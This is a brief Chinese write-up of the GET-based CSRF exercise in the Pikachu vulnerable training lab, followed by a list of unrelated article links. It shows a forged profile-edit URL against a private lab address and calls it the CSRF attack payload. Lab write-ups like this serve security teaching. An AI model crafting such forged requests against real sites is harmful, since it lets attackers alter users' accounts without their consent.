Pikachu-csrf-CSRF(get)
最编程
2024-10-05 10:16:17
...
登陆,修改个人信息;发现这是个get请求
把请求连接复制出来
http://192.168.3.224:8082/vul/csrf/csrfget/csrf_get_edit.php?sex=1&phonenum=1&add=2&email=3&submit=submit
就是 get请求的csrf 攻击payload
推荐阅读
-
Pikachu-csrf-CSRF(get)
-
OpenCV 视频 I/O(2)视频捕获类 VideoCapture 利用函数 get 检索视频流的各种属性--运行结果
-
为什么 LoRA 修剪与不修剪效果相同?在 PEFT <= 0.12.0 下错误使用 get_peft_model
-
$_POST = file_get_contents("php://input"); 这是什么意思?
-
阿里云Shell脚本(get_cpu_mem_info.sh):监测CPU和内存的解决方案
-
sudo apt-get update: GPG 错误:http://packages.ros.org/ros/ubuntu bionic InRelease,签名无效: EXPKEYSIG :sudo apt-get update 报错:GPG 错误:无效的签名“EXPKEYSIG”在 http://packages.ros.org/ros/ubuntu bionic InRelease 中
-
五招测网速,轻松get!
-
想试试画思维导图吗?这几款软件专业又好用,赶快get!
-
新技能get!今天学了如何使用扫描全能王
-
入门JMeter:环境安装与Python接口自动化(requests模块的get请求详解)